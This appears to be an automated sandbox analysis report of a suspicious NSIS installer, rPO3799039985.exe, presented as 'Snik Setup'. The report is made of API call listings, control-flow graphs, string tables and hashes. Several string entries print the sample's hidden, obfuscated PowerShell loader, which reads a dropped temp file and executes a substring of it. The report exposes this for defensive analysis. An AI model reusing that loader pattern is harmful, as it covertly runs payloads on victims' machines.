                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004053B0
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 004053FB
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00405401
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                          • String ID: Snik Setup: Completed
                                                                                                                                                                                                          • API String ID: 590372296-158401218
                                                                                                                                                                                                          • Opcode ID: f2655e17f1c29db469806ccc784f5eaafc8cdfea11381c65d7ae9fc160b482ac
                                                                                                                                                                                                          • Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2655e17f1c29db469806ccc784f5eaafc8cdfea11381c65d7ae9fc160b482ac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69

                                                                                                                                                                                                          Control-flow Graph (function at 00405D51; graph rendering not included in this text)
APIs
• GetVersion.KERNEL32(?,Completed,00000000,00404F80,Completed,00000000), ref: 00405E02
• GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E7D
• GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E90
• SHGetSpecialFolderLocation.SHELL32(?,0041C1AE), ref: 00405ECC
• SHGetPathFromIDListA.SHELL32(0041C1AE,: Completed), ref: 00405EDA
• CoTaskMemFree.OLE32(0041C1AE), ref: 00405EE5
• lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
• lstrlenA.KERNEL32(: Completed,?,Completed,00000000,00404F80,Completed,00000000), ref: 00405F59
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
• API String ID: 900638850-146550638
• Opcode ID: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
• Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
• Opcode Fuzzy Hash: 98f05c3dc1858b41120149467393982af1d97fd6e6ff5002d2d572682a9130ff
• Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
APIs
• FindFirstFileA.KERNELBASE(75083410,0042B0B8,C:\,004058D2,C:\,C:\,00000000,C:\,C:\,75083410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,75083410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
• FindClose.KERNEL32(00000000), ref: 0040604A
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: C:\
• API String ID: 2295610775-3404278061
• Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
• Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
• Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
• Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

Control-flow Graph

control_flow_graph 179 403a41-403a53 180 403b94-403ba3 179->180 181 403a59-403a5f 179->181 183 403bf2-403c07 180->183 184 403ba5-403bed GetDlgItem * 2 call 403f14 SetClassLongA call 40140b 180->184 181->180 182 403a65-403a6e 181->182 185 403a70-403a7d SetWindowPos 182->185 186 403a83-403a86 182->186 188 403c47-403c4c call 403f60 183->188 189 403c09-403c0c 183->189 184->183 185->186 191 403aa0-403aa6 186->191 192 403a88-403a9a ShowWindow 186->192 196 403c51-403c6c 188->196 194 403c0e-403c19 call 401389 189->194 195 403c3f-403c41 189->195 197 403ac2-403ac5 191->197 198 403aa8-403abd DestroyWindow 191->198 192->191 194->195 216 403c1b-403c3a SendMessageA 194->216 195->188 201 403ee1 195->201 202 403c75-403c7b 196->202 203 403c6e-403c70 call 40140b 196->203 207 403ac7-403ad3 SetWindowLongA 197->207 208 403ad8-403ade 197->208 205 403ebe-403ec4 198->205 204 403ee3-403eea 201->204 212 403c81-403c8c 202->212 213 403e9f-403eb8 DestroyWindow EndDialog 202->213 203->202 205->201 210 403ec6-403ecc 205->210 207->204 214 403b81-403b8f call 403f7b 208->214 215 403ae4-403af5 GetDlgItem 208->215 210->201 218 403ece-403ed7 ShowWindow 210->218 212->213 219 403c92-403cdf call 405d51 call 403f14 * 3 GetDlgItem 212->219 213->205 214->204 220 403b14-403b17 215->220 221 403af7-403b0e SendMessageA IsWindowEnabled 215->221 216->204 218->201 249 403ce1-403ce6 219->249 250 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 219->250 224 403b19-403b1a 220->224 225 403b1c-403b1f 220->225 221->201 221->220 227 403b4a-403b4f call 403eed 224->227 228 403b21-403b27 225->228 229 403b2d-403b32 225->229 227->214 230 403b68-403b7b SendMessageA 228->230 231 403b29-403b2b 228->231 229->230 232 403b34-403b3a 229->232 230->214 231->227 235 403b51-403b5a call 40140b 232->235 236 403b3c-403b42 call 40140b 232->236 235->214 246 403b5c-403b66 235->246 245 403b48 236->245 245->227 246->245 249->250 253 403d27-403d28 250->253 254 403d2a 250->254 255 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403d5c-403d6d SendMessageA 255->256 257 403d6f 255->257 258 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 256->258 257->258 258->196 267 403db4-403db6 258->267 267->196 268 403dbc-403dc0 267->268 269 403dc2-403dc8 268->269 270 403ddf-403df3 DestroyWindow 268->270 269->201 271 403dce-403dd4 269->271 270->205 272 403df9-403e26 CreateDialogParamA 270->272 271->196 273 403dda 271->273 272->205 274 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->274 273->201 274->201 279 403e85-403e98 ShowWindow call 403f60 274->279 281 403e9d 279->281 281->205
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
• ShowWindow.USER32(?), ref: 00403A9A
• DestroyWindow.USER32 ref: 00403AAE
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
• GetDlgItem.USER32(?,?), ref: 00403AEB
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
• IsWindowEnabled.USER32(00000000), ref: 00403B06
• GetDlgItem.USER32(?,00000001), ref: 00403BB4
• GetDlgItem.USER32(?,00000002), ref: 00403BBE
• SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
• GetDlgItem.USER32(?,00000003), ref: 00403CCF
• ShowWindow.USER32(00000000,?), ref: 00403CF0
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
• EnableWindow.USER32(?,?), ref: 00403D1D
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
• EnableMenuItem.USER32(00000000), ref: 00403D3A
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
• lstrlenA.KERNEL32(Snik Setup: Completed,?,Snik Setup: Completed,Snik Setup), ref: 00403D8E
• SetWindowTextA.USER32(?,Snik Setup: Completed), ref: 00403D9D
• ShowWindow.USER32(?,0000000A), ref: 00403ED1
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: Snik Setup$Snik Setup: Completed
• API String ID: 3282139019-903832360
• Opcode ID: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
• Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
• Opcode Fuzzy Hash: f98975a4e5554a2baf397d4590875313958baff0fae13c36641d055b5d6685e2
• Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

Control-flow Graph (function starting at 004036AF; graph image not reproduced, legend: Executed / Not Executed)
APIs
  • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
  • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
• lstrcatA.KERNEL32(1033,Snik Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Snik Setup: Completed,00000000,00000002,75083410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPO3799039985.exe",00000000), ref: 0040372A
• lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,1033,Snik Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Snik Setup: Completed,00000000,00000002,75083410), ref: 0040379F
• lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
• GetFileAttributesA.KERNEL32(: Completed), ref: 004037BD
• LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen), ref: 00403806
  • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
• RegisterClassA.USER32(0042DBA0), ref: 00403843
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
• ShowWindow.USER32(00000005,00000000), ref: 004038C6
• GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
• GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
• RegisterClassA.USER32(0042DBA0), ref: 00403908
• DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Snik Setup: Completed$_Nb
• API String ID: 1975747703-400253189
• Opcode ID: 0292f59ab6d59e57951c6bdb15198e3a3899d8923361e63ce45ef1692923f403
• Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
• Opcode Fuzzy Hash: 0292f59ab6d59e57951c6bdb15198e3a3899d8923361e63ce45ef1692923f403
• Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

Control-flow Graph (function starting at 00402C66; graph image not reproduced, legend: Executed / Not Executed)
APIs
• GetTickCount.KERNEL32 ref: 00402C77
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rPO3799039985.exe,00000400), ref: 00402C93
  • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004059A6
  • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
• GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rPO3799039985.exe,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 00402CDF
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
• Inst, xrefs: 00402D4B
• "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 00402C66
• Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
• Null, xrefs: 00402D5D
• soft, xrefs: 00402D54
• C:\Users\user\Desktop\rPO3799039985.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
• Error launching installer, xrefs: 00402CB6
• C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rPO3799039985.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
• API String ID: 4283519449-3484894894
• Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
• Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
• Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
• Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

Control-flow Graph (function starting at 00401751; graph image not reproduced, legend: Executed / Not Executed)
APIs
• lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,00000000,00000000,00000031), ref: 00401790
• CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),00000000,00000000,powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum),C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen,00000000,00000000,00000031), ref: 004017BA
  • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Snik Setup,NSIS Error), ref: 00405D3C
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
  • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
  • Part of subcall function 00404F48: lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
  • Part of subcall function 00404F48: SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
  • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
Strings
• C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen, xrefs: 0040177E
• powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 0040176D, 00401776, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
• powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum), xrefs: 00401805, 00401811, 00401829
• C:\Users\user\Pictures\spikenard\Fortrds112.dll, xrefs: 0040181E, 0040183A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$C:\Users\user\Pictures\spikenard\Fortrds112.dll$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)
                                                                                                                                                                                                          • API String ID: 1941528284-2913473020
                                                                                                                                                                                                          • Opcode ID: 8e2d62e47d2b72436ba3909645e11aea5521aa9bd9be8d52c1acf3c49aeb8e71
                                                                                                                                                                                                          • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e2d62e47d2b72436ba3909645e11aea5521aa9bd9be8d52c1acf3c49aeb8e71
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

Control-flow Graph
control_flow_graph 552 404f48-404f5d 553 405013-405017 552->553 554 404f63-404f75 552->554 555 404f80-404f8c lstrlenA 554->555 556 404f77-404f7b call 405d51 554->556 558 404fa9-404fad 555->558 559 404f8e-404f9e lstrlenA 555->559 556->555 561 404fbc-404fc0 558->561 562 404faf-404fb6 SetWindowTextA 558->562 559->553 560 404fa0-404fa4 lstrcatA 559->560 560->558 563 404fc2-405004 SendMessageA * 3 561->563 564 405006-405008 561->564 562->561 563->564 564->553 565 40500a-40500d 564->565 565->553
APIs
• lstrlenA.KERNEL32(Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
• lstrlenA.KERNEL32(00402FFA,Completed,00000000,0041C1AE,750823A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
• lstrcatA.KERNEL32(Completed,00402FFA,00402FFA,Completed,00000000,0041C1AE,750823A0), ref: 00404FA4
• SetWindowTextA.USER32(Completed,Completed), ref: 00404FB6
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Completed
• API String ID: 2531174081-3087654605
• Opcode ID: 8631652a5c26d775c5f5b87e073b94c67094b482377ae5d2493a18bd051b8853
• Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
• Opcode Fuzzy Hash: 8631652a5c26d775c5f5b87e073b94c67094b482377ae5d2493a18bd051b8853
• Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8

Control-flow Graph
